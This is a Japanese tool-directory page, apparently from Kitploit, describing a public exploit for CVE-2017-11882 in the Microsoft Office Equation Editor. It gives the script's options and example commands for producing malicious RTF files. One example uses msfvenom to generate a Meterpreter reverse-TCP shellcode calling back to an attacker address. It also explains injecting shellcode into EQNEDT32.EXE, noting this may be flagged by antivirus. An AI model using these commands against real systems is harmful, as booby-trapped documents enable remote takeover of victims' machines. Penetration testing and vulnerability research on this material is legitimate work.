Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2017-11882 — CVE-2017-11882 エクスプロイトは、最大で17kバイトを超える長さのコマンド/コードを受け入れます。 | Kitploit
ツール/GitHubGitHub/rip1s/cve-2017-11882
ペイロード生成脆弱性分析エクスプロイトシェルコードウェブアプリケーション悪用ペネトレーションテストバイナリエクスプロイト
GitHubrip1s/cve-2017-11882

CVE-2017-11882

CVE-2017-11882 エクスプロイトは、最大で17kバイトを超える長さのコマンド/コードを受け入れます。

リポジトリを見る
330928年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2017-11882 エクスプロイト

CVE-2017-11882 エクスプロイトは、最大17kバイトを超える長さのコマンド/コードを受け入れます。

リモートコマンド実行の場合、このエクスプロイトは SW_HIDE で WinExec を呼び出し、WinExec が戻った後に ExitProcess を呼び出します。

リモートコード実行の場合、このエクスプロイトは単にコードへ jmp します。

オブジェクト構造のリファレンスが見つからないため...任意の長さのコード実行のためにファイル長を変更することはできません..:(

しかし、17kバイトあれば本当に十分だと思います。Pythonスクリプトが必要なペイロードサイズを検出し、適切なペイロードテンプレートを選択します。

注意: 別のプロセスにマイグレーションしない場合、RCE は winword プロセスをフリーズさせます!

現在、このエクスプロイトは -i フラグを指定すると、シェルコードを新しい EQNEDT32.EXE プロセスにインジェクションします。この操作は AV に疑われる可能性がありますが、Word プロセスはフリーズしません。

使用方法

root@kitploit:~
usage: CVE-2017-11882.py [-h] -c CMD [-t {0,1}] [-i INJECT] -o OUTPUT

Exploit for CVE-2017-11882 @unamer(https://github.com/unamer/CVE-2017-11882)

optional arguments:
  -h, --help            show this help message and exit
  -c CMD, --cmd CMD     Command or shellcode file to run in target system
                        (Must be shorter than 17967 bytes!!)
  -t {0,1}, --type {0,1}
                        Type (0:shellcode 1:command, default=1)
  -i INJECT, --inject INJECT
                        Inject shellcode to new process
  -o OUTPUT, --output OUTPUT
                        Output exploit rtf

例:

リモートコマンド実行の場合

root@kitploit:~
CVE-2017-11882.py -c cmd.exe -o test.rtf

リモートコード実行の場合

  1. シェルコードを生成します
root@kitploit:~
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.115 LPORT=2333 -o ./sc.bin
  1. エクスプロイトを生成します
root@kitploit:~
CVE-2017-11882.py -c sc.bin -t 0 -i 1 -o test.rtf

デバッグ

  1. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EQNEDT32.EXE のデバッガー値に、使用するデバッガーのパスを設定します。

  2. エクスプロイトをビルドして実行します。

  3. 0x41165f にブレークポイントを設定します。

  4. このブレークポイントは2回ヒットします。2回目に、この関数が戻った後にペイロードが実行されます。

リファレンス

  1. https://github.com/embedi/CVE-2017-11882
  2. https://embedi.com/files/white-papers/skeleton-in-the-closet.pdf
  3. https://0patch.blogspot.co.id/2017/11/did-microsoft-just-manually-patch-their.html
ツールをダウンロード